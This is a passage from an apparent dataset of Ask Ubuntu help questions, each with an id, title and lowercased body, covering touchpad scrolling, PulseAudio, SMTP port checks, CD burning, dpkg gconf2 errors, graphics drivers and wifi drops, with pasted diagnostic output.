0 evdev third button emulation timeout ( 274 ) : 1000 evdev third button emulation button ( 275 ) : 3 evdev third button emulation threshold ( 276 ) : 20 evdev wheel emulation ( 277 ) : 1 evdev wheel emulation axes ( 278 ) : 6 , 7 , 4 , 5 evdev wheel emulation inertia ( 279 ) : 10 evdev wheel emulation timeout ( 280 ) : 200 evdev wheel emulation button ( 281 ) : 2 evdev drag lock buttons ( 282 ) : 0 the xinput properties listing for the clickpad device ( xinput -- list-props `` synps/2 synaptics touchpad '' ) is as follows : device 'synps/2 synaptics touchpad ' : device enabled ( 134 ) : 1 coordinate transformation matrix ( 136 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 262 ) : 1 device accel constant deceleration ( 263 ) : 2.500000 device accel adaptive deceleration ( 264 ) : 1.000000 device accel velocity scaling ( 265 ) : 12.500000 synaptics edges ( 308 ) : 1768 , 5414 , 1638 , 4466 synaptics finger ( 309 ) : 25 , 30 , 0 synaptics tap time ( 310 ) : 180 synaptics tap move ( 311 ) : 235 synaptics tap durations ( 312 ) : 180 , 180 , 100 synaptics clickpad ( 313 ) : 1 synaptics middle button timeout ( 314 ) : 0 synaptics two-finger pressure ( 315 ) : 282 synaptics two-finger width ( 316 ) : 7 synaptics scrolling distance ( 317 ) : 107 , 107 synaptics edge scrolling ( 318 ) : 0 , 0 , 0 synaptics two-finger scrolling ( 319 ) : 1 , 1 synaptics move speed ( 320 ) : 1.000000 , 1.750000 , 0.037293 , 0.000000 synaptics off ( 321 ) : 0 synaptics locked drags ( 322 ) : 0 synaptics locked drags timeout ( 323 ) : 5000 synaptics tap action ( 324 ) : 2 , 3 , 0 , 0 , 1 , 3 , 0 synaptics click action ( 325 ) : 1 , 3 , 0 synaptics circular scrolling ( 326 ) : 0 synaptics circular scrolling distance ( 327 ) : 0.100000 synaptics circular scrolling trigger ( 328 ) : 0 synaptics palm detection ( 329 ) : 0 synaptics palm dimensions ( 330 ) : 10 , 200 synaptics coasting speed ( 331 ) : 20.000000 , 50.000000 synaptics pressure motion ( 332 ) : 30 , 160 synaptics pressure motion factor ( 333 ) : 1.000000 , 1.000000 synaptics resolution detect ( 334 ) : 1 synaptics grab event device ( 335 ) : 1 synaptics gestures ( 336 ) : 1 synaptics capabilities ( 337 ) : 1 , 0 , 0 , 1 , 1 , 1 , 1 synaptics pad resolution ( 338 ) : 55 , 53 synaptics area ( 339 ) : 0 , 0 , 0 , 1 synaptics soft button areas ( 340 ) : 4184 , 0 , 1 , 2788 , 2997 , 4184 , 1 , 2788 synaptics noise cancellation ( 341 ) : 8 , 8 device product id ( 251 ) : 2 , 7 device node ( 252 ) : `` /dev/input/event10 '' sample xev output for the button usage is as follows : buttonpress event , serial 40 , synthetic no , window 0x5200001 , root 0x9e , subw 0x0 , time 17803214 , ( 103,77 ) , root : ( 1845,126 ) , state 0x0 , button 2 , same_screen yes buttonrelease event , serial 40 , synthetic no , window 0x5200001 , root 0x9e , subw 0x0 , time 17803294 , ( 103,77 ) , root : ( 1845,126 ) , state 0x200 , button 2 , same_screen yes i would appreciate any guidance you might have on enabling the middle button scrolling . thanks ! edit : i 've acquired an external thinkpad usb keyboard that features both a trackpoint pointing stick and three dedicated mouse buttons . i have performed the scroll up and scroll down operations successfully using this keyboard and have recorded the relevant xev output . the following is the xev output for the successful scroll up operation : buttonpress event , serial 40 , synthetic no , window 0x4c00001 , root 0x9e , subw 0x4c00002 , time 53834970 , ( 55,63 ) , root : ( 1797,1083 ) , state 0x0 , button 5 , same_screen yes enternotify event , serial 40 , synthetic no , window 0x4c00001 , root 0x9e , subw 0x0 , time 53834946 , ( 55,63 ) , root : ( 1797,1083 ) , mode notifygrab , detail notifyinferior , same_screen yes , focus yes , state 4096 keymapnotify event , serial 40 , synthetic no , window 0x0 , keys : 4294967198 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 buttonrelease event , serial 40 , synthetic no , window 0x4c00001 , root 0x9e , subw 0x4c00002 , time 53834970 , ( 55,63 ) , root : ( 1797,1083 ) , state 0x1000 , button 5 , same_screen yes leavenotify event , serial 40 , synthetic no , window 0x4c00001 , root 0x9e , subw 0x0 , time 53834946 , ( 55,63 ) , root : ( 1797,1083 ) , mode notifyungrab , detail notifyinferior , same_screen yes , focus yes , state 0 the following is the xev output for the successful scroll down operation : buttonpress event , serial 40 , synthetic no , window 0x4c00001 , root 0x9e , subw 0x4c00002 , time 53829778 , ( 55,63 ) , root : ( 1797,1083 ) , state 0x0 , button 5 , same_screen yes enternotify event , serial 40 , synthetic no , window 0x4c00001 , root 0x9e , subw 0x0 , time 53829754 , ( 55,63 ) , root : ( 1797,1083 ) , mode notifygrab , detail notifyinferior , same_screen yes , focus yes , state 4096 keymapnotify event , serial 40 , synthetic no , window 0x0 , keys : 4294967198 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 buttonrelease event , serial 40 , synthetic no , window 0x4c00001 , root 0x9e , subw 0x4c00002 , time 53829778 , ( 55,63 ) , root : ( 1797,1083 ) , state 0x1000 , button 5 , same_screen yes leavenotify event , serial 40 , synthetic no , window 0x4c00001 , root 0x9e , subw 0x0 , time 53829754 , ( 55,63 ) , root : ( 1797,1083 ) , mode notifyungrab , detail notifyinferior , same_screen yes , focus yes , state 0 so , with this additional information , would any of you kind , clever people have any guidance on how to instate this type of scrolling on my little thinkpad ? : )
400999	no sound indicator or sound settings after playing with hda-jack-retask	i was playing with hda-jack-retask ( changed mic input to line out output ) , after i finished everything was ok , system settings showed new device in sound tab , after few restarts that what happens : in system settings at sound tab there are no output devices . sound indicator is not statring at system startup , when i try to start it manually i get : /usr/lib/x86_64-linux-gnu/indicator-sound/indicator-sound-service ** ( process:5348 ) : warning ** : volume-control.vala:201 : pa_context_connect ( ) failed : ok and then it just stays like that , also keyboard controls are not working . alsamixer works fine , i 'm using it to control volume right now . from source code of volume-control.vala i see there is some problem with pulseaudio . could anyone help me locate resolve this problem ? maybe pulseaudio need to be reconfigured or restarted somehow ?
401000	if you can send emails from server , but can not configure desktop client , can you say smtp is working ?	this question is a somewhat prologue to a different question posted ( here ) . as i can state that i can send email from my ubuntu server ( 12.04 ) via roundcube , perfectly . however , i can not manage to correctly configure my desktop email client on my mac . and i feel the problem lies in the smtp port . however , i want to know where i should be debugging . therefore i want to know : if i can send emails from the server , via roundcube , can i state that the smtp server/postfix is correctly installed/configured/working ? edit : just found this information , which made help : starting nmap 5.21 ( http : //nmap.org ) at 2014-01-06 15:50 cet nmap scan report for localhost ( 127.0.0.1 ) host is up ( 0.0000060s latency ) . not shown : 993 closed ports port state service 21/tcp open ftp 22/tcp open ssh 53/tcp open domain 80/tcp open http 110/tcp open pop3 143/tcp open imap 3306/tcp open mysql sudo netstat -tlnp root @ vps : ~ # sudo netstat -tlnp active internet connections ( only servers ) proto recv-q send-q local address foreign address state pid/program name tcp 0 0 127.0.0.1:10025 0.0.0.0 : * listen 2550/master tcp 0 0 127.0.0.1:3306 0.0.0.0 : * listen 779/mysqld tcp 0 0 0.0.0.0:110 0.0.0.0 : * listen 758/dovecot tcp 0 0 0.0.0.0:143 0.0.0.0 : * listen 758/dovecot tcp 0 0 0.0.0.0:80 0.0.0.0 : * listen 1002/apache2 tcp 0 0 159.253.1.196:53 0.0.0.0 : * listen 744/named tcp 0 0 127.0.0.1:53 0.0.0.0 : * listen 744/named tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen 665/sshd tcp 0 0 0.0.0.0:25 0.0.0.0 : * listen 2550/master tcp 0 0 127.0.0.1:953 0.0.0.0 : * listen 744/named tcp 0 0 0.0.0.0:4190 0.0.0.0 : * listen 758/dovecot tcp6 0 0 : ::21 : : : * listen 946/proftpd : ( accep tcp6 0 0 : ::22 : : : * listen 665/sshd tcp6 0 0 : ::25 : : : * listen 2550/master
401001	k3b problem burning cd	i ca n't make audio cds with k3b although in the past i could ... anyone who has a clue about it is welcome ... this is my debugging output : devices hl-dt-st dvd+-rw gt10n a109 ( /dev/sr0 , cd-r , cd-rw , cd-rom , dvd-rom , dvd-r , dvd-rw , dvd-r dl , dvd+r , dvd+rw , dvd+r dl ) [ dvd-rom , dvd-r sequential , dvd-r dual layer sequential , dvd-ram , dvd-rw restricted overwrite , dvd-rw sequential , dvd+rw , dvd+r , dvd+r dual layer , cd-rom , cd-r , cd-rw ] [ sao , tao , raw , sao/r96p , sao/r96r , raw/r16 , raw/r96p , raw/r96r , restricted overwrite ] [ % 7 ] system k3b version : 2.0.2 kde version : 4.11.3 qt version : 4.8.4 kernel : 3.11.0-15-generic
401003	setting up gconf2 , problem	recently i removed mono develop . after that every time when i install new packages it show 's me the below message . i tried sudo apt-get install -f but it did n't work . how fix it ? reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . 13 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up gconf2 ( 3.2.5-0ubuntu2 ) ... /usr/share/gconf/schemas/desktop_gnome_url_handlers.schemas:105 : parser error : premature end of data in tag locale line 102 ^ /usr/share/gconf/schemas/desktop_gnome_url_handlers.schemas:105 : parser error : premature end of data in tag schema line 95 ^ /usr/share/gconf/schemas/desktop_gnome_url_handlers.schemas:105 : parser error : premature end of data in tag schemalist line 3 ^ /usr/share/gconf/schemas/desktop_gnome_url_handlers.schemas:105 : parser error : premature end of data in tag gconfschemafile line 2 ^ /usr/share/gconf/schemas/desktop_gnome_peripherals_keyboard.schemas:132 : parser error : premature end of data in tag long line 132 < long > file name of the bell s ^ /usr/share/gconf/schemas/desktop_gnome_peripherals_keyboard.schemas:132 : parser error : premature end of data in tag locale line 130 < long > file name of the bell s ^ /usr/share/gconf/schemas/desktop_gnome_peripherals_keyboard.schemas:132 : parser error : premature end of data in tag schema line 124 < long > file name of the bell s ^ /usr/share/gconf/schemas/desktop_gnome_peripherals_keyboard.schemas:132 : parser error : premature end of data in tag schemalist line 3 < long > file name of the bell s ^ /usr/share/gconf/schemas/desktop_gnome_peripherals_keyboard.schemas:132 : parser error : premature end of data in tag gconfschemafile line 2 < long > file name of the bell s ^ /usr/share/gconf/schemas/desktop_gnome_peripherals_mouse.schemas:117 : parser error : premature end of data in tag key line 117 < key > /schemas/desktop/gnom ^ /usr/share/gconf/schemas/desktop_gnome_peripherals_mouse.schemas:117 : parser error : premature end of data in tag schema line 116 < key > /schemas/desktop/gnom ^ /usr/share/gconf/schemas/desktop_gnome_peripherals_mouse.schemas:117 : parser error : premature end of data in tag schemalist line 3 < key > /schemas/desktop/gnom ^ /usr/share/gconf/schemas/desktop_gnome_peripherals_mouse.schemas:117 : parser error : premature end of data in tag gconfschemafile line 2 < key > /schemas/desktop/gnom ^ /usr/share/gconf/schemas/system_http_proxy.schemas:113 : parser error : expected ' > ' < short > proxy configuration mode < /shor ^ /usr/share/gconf/schemas/system_http_proxy.schemas:113 : parser error : opening and ending tag mismatch : short line 113 and shor < short > proxy configuration mode < /shor ^ /usr/share/gconf/schemas/system_http_proxy.schemas:113 : parser error : premature end of data in tag locale line 112 < short > proxy configuration mode < /shor ^ /usr/share/gconf/schemas/system_http_proxy.schemas:113 : parser error : premature end of data in tag schema line 105 < short > proxy configuration mode < /shor ^ /usr/share/gconf/schemas/system_http_proxy.schemas:113 : parser error : premature end of data in tag schemalist line 3 < short > proxy configuration mode < /shor ^ /usr/share/gconf/schemas/system_http_proxy.schemas:113 : parser error : premature end of data in tag gconfschemafile line 2 < short > proxy configuration mode < /shor ^ /usr/share/gconf/schemas/desktop_gnome_lockdown.schemas:119 : parser error : premature end of data in tag applyto line 119 < applyto > /desktop/gnome/lockdown/disable_applicatio ^ /usr/share/gconf/schemas/desktop_gnome_lockdown.schemas:119 : parser error : premature end of data in tag schema line 117 < applyto > /desktop/gnome/lockdown/disable_applicatio ^ /usr/share/gconf/schemas/desktop_gnome_lockdown.schemas:119 : parser error : premature end of data in tag schemalist line 3 < applyto > /desktop/gnome/lockdown/disable_applicatio ^ /usr/share/gconf/schemas/desktop_gnome_lockdown.schemas:119 : parser error : premature end of data in tag gconfschemafile line 2 < applyto > /desktop/gnome/lockdown/disable_applicatio ^ /usr/share/gconf/schemas/desktop_gnome_interface.schemas:115 : parser error : expected ' > ' < owner > gnome < /o ^ /usr/share/gconf/schemas/desktop_gnome_interface.schemas:115 : parser error : opening and ending tag mismatch : owner line 115 and o < owner > gnome < /o ^ /usr/share/gconf/schemas/desktop_gnome_interface.schemas:115 : parser error : premature end of data in tag schema line 112 < owner > gnome < /o ^ /usr/share/gconf/schemas/desktop_gnome_interface.schemas:115 : parser error : premature end of data in tag schemalist line 3 < owner > gnome < /o ^ /usr/share/gconf/schemas/desktop_gnome_interface.schemas:115 : parser error : premature end of data in tag gconfschemafile line 2 < owner > gnome < /o ^ /usr/share/gconf/schemas/desktop_gnome_accessibility_keyboard.schemas:127 : parser error : premature end of data in tag gettext_domain line 127 < gettext_domain > libgnome- ^ /usr/share/gconf/schemas/desktop_gnome_accessibility_keyboard.schemas:127 : parser error : premature end of data in tag schema line 121 < gettext_domain > libgnome- ^ /usr/share/gconf/schemas/desktop_gnome_accessibility_keyboard.schemas:127 : parser error : premature end of data in tag schemalist line 3 < gettext_domain > libgnome- ^ /usr/share/gconf/schemas/desktop_gnome_accessibility_keyboard.schemas:127 : parser error : premature end of data in tag gconfschemafile line 2 < gettext_domain > libgnome- ^ dpkg : error processing gconf2 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of libgnomevfs2-common : libgnomevfs2-common depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing libgnomevfs2-common ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgnomevfs2-0 : libgnomevfs2-0 depends on libgnomevfs2-common ( > = 1:2.24 ) ; however : package libgnomevfs2-common is not configured yet . libgnomevfs2-0 depends on libgnomevfs2-common ( < < 1:2.25 ) ; however : package libgnomevfs2-common is not configured yet . dpkg : error processing libgnomevfs2-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgnome2-common : libgnome2-common depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing libgnome2-common ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libno apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already gnome2-0 : libgnome2-0 depends on libgnomevfs2-0 ( > = 1:2.17.90 ) ; however : package libgnomevfs2-0 is not configured yet . libgnome2-0 depends on libgnome2-common ( > = 2.32 ) ; however : package libgnome2-common is not configured yet . libgnome2-0 depends on libgnome2-common ( < < 2.33 ) ; however : package libgnome2-common is not configured yet . dpkg : error processing libgnome2-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libbonoboui2-0 : libbonoboui2-0 depends on libgnome2-0 ( > = 2.17.3 ) ; however : package libgnome2-0 is not configured yet . dpkg : error processing libbonoboui2-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgnomeui-0 : libgnomeui-0 depends on libbonoboui2-0 ( > = 2.15.1 ) ; however : package libbonoboui2-0 is not configured yet . libgnomeui-0 depends on libgnome2-0 ( > = 2.17.3 ) ; however : package libgnome2-0 is not configured yet . libgnomeui-0 depends on libgnomevfs2-0 ( > = 1:2.17.90 ) ; however : package libgnomevfs2-0 is not configured yet . dpkg : error processing libgnomeui-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libcanberra-gtk-module : i386 : libcanberra-gtk-module : i386 depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing libcanberra-gtk-module : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of ia32-libs-multiarch : i386 : ia32-libs-multiarch : i386 depends on libcanberra-gtk-module ; however : package libcanberra-gtk-module : i386 is not configured yet . dpkg : error processing ia32-libs-multiarch : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of ia32-libs : ia32-libs depends on ia32-libs-multiarch ; however : package ia32-libs-multiarch is not installed . package ia32-libs-multiarch : i386 is not configured yet . dpkg : error processing ia32-libs ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of metacity-common : metacity-common depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing metacity-common ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libmetacity-private0 : libmetacity-private0 depends on metacity-common ( > = 1:2.34 ) ; however : package metacity-common is not configured yet . libmetacity-private0 depends on metacity-common ( < < 1:2.35 ) ; however : package metacity-common is not configured yet . dpkg : error processing libmetacity-private0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgnome2-bin : libgnome2-bin depends on libgnome2-0 ( > = 2.17.3 ) ; however : package libgnome2-0 is not configured yet . dpkg : error processing libgnome2-bin ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : gconf2 libgnomevfs2-common libgnomevfs2-0 libgnome2-common libgnome2-0 libbonoboui2-0 libgnomeui-0 libcanberra-gtk-module : i386 ia32-libs-multiarch : i386 ia32-libs metacity-common libmetacity-private0 libgnome2-bin e : sub-process /usr/bin/dpkg returned an error code ( 1 )
401007	will the pc boot from the dvd and install ubuntu on an empty hard disk ?	i have an extra pc and its hard drive died . i would like to buy a new hard drive , 500gig , and load ubuntu . my question though is if i burn ubuntu iso with an iso burner , will the pc boot from the dvd and install ubuntu on an empty hard disk ?
401008	install ubuntu with windows 8	i need to install ubuntu alongside with my current version of windows in my new computer ( i prefer ubuntu but i still need windows to run some programs in my work place ) . the point is that , in windows 8 i can not access bios as i did the first time that i installed ubuntu in my older computer . can somebody please provide me a detailed information about how to install ubuntu without corrupting windows 8 thanks people . luis
401009	command to open new terminal window from the current terminal ?	i installed xdotool by running sudo apt-get install xdotool and throw xdotool key ctrl+alt+t command to open a new terminal window from the current one.but it was not working . what was the command to open a new terminal window from the current gnome-terminal ?
401013	how to install radeon open source and ati catalyst ( fglrx ) together ?	-ubuntu 13.10- i have two ati video cards . onboard rs690 ( x1200 ) and pcie r9-290 rs690 only works with radeon open source since amd doesnt support it anymore r9 only works with new ati drivers ( i try with catalyst 13.12 ) lspci | grep vga 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs690 [ radeon x1200 ] 02:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] hawaii pro [ radeon r9 290 ] each card works well individually in a fresh installation all attempts for work together were disastrous , so the question is : how to install radeon open source and ati catalyst ( fglrx ) together ? ?
401021	ubuntu 12.04 bluetooth mouse shows as keyboard	any idea why my bluetooth mouse shows up as keyboard on the power settings for ubuntu 12.04 ?
401023	how to edit grub default operating system ?	i 'm using dual boot and i want to use windows 7 as the default operating system.so how can i change default os of grub boot loader ?
401028	i have a hp tx2500 tablet/laptop	which ubuntu os should i download ... laptop or tablet . i have a hp tx2500 tablet/laptop and would like to know which version of ubuntu to download to get rid of vista tablet os
401029	no 3d acceleration on amd radeon 3000 hd graphics ( failed to load firmware `` radeon/rs780_pfp.bin '' )	i installed kubuntu 13.10 and it was working fine before i started the update procedure . after the update my system 's cpu usage was too high . trying to investigate , i found that the adapter string on glxinfo is changed to `` gallium 0.4 on llvmpipe '' from `` gallium 0.4 on rs780 '' the dmesg output says `` failed to load firmware - '' raedon/rs780_pfp.bin '' so disabled 3d acceleration ! ! ! ? ? ? what the hell ? ? this unboard mobo graphics supports direct 3d 10 in windows and it has no support from the manufacturer for linux ? although it claims to have non free drivers but its not for kernel version 3.11 and recent xorg version . need your help please . thanx in advance
401033	can i send a message through network ?	how can i send a message to all ubuntu desktops in my network , as net send * in windows ? is there any tip other than installing a software in both side ? is it possible to send this message to a specific ip ?
401038	desktop wo n't load ubuntu 12.10	i have had no issues with ubuntu until i recently did the upgrade to 12.10 . now when the computer reboots it is only showing the log in for terminal . unfortunately i do n't have a screenshot . so , on 12.04 i had to sometimes manually restart the lightdm service and then it would load . now when i try that command it wo n't do it . specs : lenovo thinkpad x1 carbon intel core i7 intel hd4000 ( i think . ) i 'm looking to switch completely off windows and for awhile was convinced i could do this , but i 'd hate to have to restart this service every time i restart the computer . any help would be great !
401042	no woobly windows in ubuntu 13.04 ?	i 've updated and installed compizconfig settings-manager by running below command , sudo apt-get install compizconfig-settings-manager compiz-plugins-extra but my wobbly window is still disabled ? please help !
401044	23 '' screen on 13.10 not filling to the corners	hi guys i installed ubuntu 13.10 this morning and have found the screen isnt being used corner too corner , i have the black around the outside is there a way to scale this up ? im currently running at 1920x1080 ( 16:9 ) and i have a hd6850 this is my very first time using any kind of ubuntu so as much help as possible would be appreciated
401045	wifi problems with tp-link wn822n ( ubuntu 13.10 )	i am having a bit of trouble with my wifi on ubuntu 13.10 . i 've never used ubuntu or linux before . i 've just installed it on my new pc and i 'm using a tp-link wn822n usb wireless network adapter to run my internet . the problem is that my internet keeps going on hold ... that is , the connection is there and seemingly working , however after about 5 minutes or so it will simply stop doing anything ( without actually dropping out ) . i just disconnect , reconnect and then it works again for another 5 minutes , rinse and repeat . does anybody have any ideas about how i can fix this ? > > cat /etc/lsb-release distrib_id=ubuntu distrib_release=13.10 distrib_codename=saucy distrib_description= '' ubuntu 13.10 '' > > lsusb bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 0bda:8178 realtek semiconductor corp. rtl8192cu 802.11n wlan adapter bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 002 : id 046d : c52b logitech , inc. unifying receiver bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 011 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 010 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 009 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 008 device 001 : id 1d6b:0002 linux foundation 2.0 root hub > > lspci -k -nn | grep -a 3 -i net 02:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 09 ) subsystem : asustek computer inc. p8h77-i motherboard [ 1043:8505 ] kernel driver in use : r8169 03:00.0 usb controller [ 0c03 ] : asmedia technology inc. asm1042 superspeed usb host controller [ 1b21:1042 ] > > sudo lshw -c network *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 09 serial : bc : ee:7b:5c : b8:11 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8168f-1_0.0.5 06/18/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:86 ioport : d000 ( size=256 ) memory : d0004000-d0004fff memory : d0000000-d0003fff *-network description : wireless interface physical id : 1 bus info : usb @ 1:5 logical name : wlan0 serial : 10 : fe : ed:17:55:9a capabilities : ethernet physical wireless configuration : broadcast=yes driver=rtl8192cu driverversion=3.11.0-15-generic firmware=n/a ip=192.168.0.11 link=yes multicast=yes wireless=ieee 802.11bgn > > lsmod module size used by parport_pc 32701 0 ppdev 17671 0 rfcomm 69130 0 bnep 19704 2 bluetooth 372041 10 bnep , rfcomm nls_iso8859_1 12713 1 snd_hda_codec_hdmi 41117 1 arc4 12608 2 kvm_amd 59987 0 kvm 431720 1 kvm_amd crct10dif_pclmul 14289 0 crc32_pclmul 13113 0 ghash_clmulni_intel 13259 0 aesni_intel 55624 2 aes_x86_64 17131 1 aesni_intel lrw 13286 1 aesni_intel gf128mul 14951 1 lrw glue_helper 13990 1 aesni_intel ablk_helper 13597 1 aesni_intel cryptd 20359 3 ghash_clmulni_intel , aesni_intel , ablk_helper rtl8192cu 67723 0 rtl_usb 18448 1 rtl8192cu rtlwifi 63229 2 rtl_usb , rtl8192cu rtl8192c_common 48877 1 rtl8192cu mac80211 597268 3 rtl_usb , rtlwifi , rtl8192cu cfg80211 480503 2 mac80211 , rtlwifi joydev 17377 0 eeepc_wmi 13151 0 asus_wmi 24191 1 eeepc_wmi sparse_keymap 13948 1 asus_wmi video 19318 1 asus_wmi mxm_wmi 13021 0 snd_hda_codec_realtek 55704 1 snd_hda_intel 48171 10 snd_hda_codec 188738 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel microcode 23576 0 snd_hwdep 13602 1 snd_hda_codec snd_pcm 102033 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel radeon 1402995 3 edac_core 62342 0 edac_mce_amd 22617 0 snd_seq_midi 13324 0 psmouse 97655 0 fam15h_power 13119 0 snd_seq_midi_event 14899 1 snd_seq_midi serio_raw 13413 0 k10temp 13126 0 sp5100_tco 13979 0 snd_page_alloc 18710 2 snd_pcm , snd_hda_intel i2c_piix4 22106 0 snd_rawmidi 30095 1 snd_seq_midi snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi ttm 84169 1 radeon snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29433 2 snd_pcm , snd_seq drm_kms_helper 52710 1 radeon drm 297056 5 ttm , drm_kms_helper , radeon snd 69141 31 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi soundcore 12680 1 snd i2c_algo_bit 13413 1 radeon mac_hid 13205 0 wmi 19070 2 mxm_wmi , asus_wmi lp 17759 0 parport 42299 3 lp , ppdev , parport_pc hid_logitech_dj 18581 0 usbhid 53014 0 hid 105858 4 usbhid , hid_logitech_dj ahci 25819 3 r8169 67581 0 libahci 31928 1 ahci mii 13934 1 r8169 [ /code ] [ code ] > > iwconfig wlan0 ieee 802.11bgn essid : '' sky12795 '' mode : managed frequency:2.437 ghz access point : 7c:4c : a5:7e : f0 : ed bit rate=72.2 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off encryption key : off power management : off link quality=63/70 signal level=-47 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:13 missed beacon:0 > > ifconfig -a eth0 link encap : ethernet hwaddr bc : ee:7b:5c : b8:11 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:3428 errors:0 dropped:0 overruns:0 frame:0 tx packets:3428 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:308618 ( 308.6 kb ) tx bytes:308618 ( 308.6 kb ) wlan0 link encap : ethernet hwaddr 10 : fe : ed:17:55:9a inet addr:192.168.0.11 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :12fe : edff : fe17:559a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:405566 errors:0 dropped:0 overruns:0 frame:0 tx packets:239178 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:548420692 ( 548.4 mb ) tx bytes:25583338 ( 25.5 mb ) > > sudo iwlist scan wlan0 scan completed : cell 01 - address : 7c:4c : a5:7e : f0 : ed channel:6 frequency:2.437 ghz ( channel 6 ) quality=60/70 signal level=-50 dbm encryption key : on essid : '' sky12795 '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=0000006169da3baa extra : last beacon : 168ms ago ie : unknown : 0008534b593132373935 ie : unknown : 010882848b962430486c ie : unknown : 030106 ie : unknown : 2a0100 ie : unknown : 2f0100 ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : 32040c121860 ie : unknown : 2d1aec181bffff000000000000000000000000000000000000000000 ie : unknown : 3d1606080400000000000000000000000000000000000000 ie : unknown : dd800050f204104a0001101044000102103b00010310470010b4507eeec180e6fee48483eac36299c31021000842726f6164636f6d1023000842726f6164636f6d1024000631323334353610420004313233341054000800060050f20400011011000a42726f6164636f6d415010080002200c103c0001011049000600372a000120 ie : unknown : dd090010180206f02c0000 ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 cell 02 - address : 02 : ac:54 : ea : b0:92 channel:1 frequency:2.412 ghz ( channel 1 ) 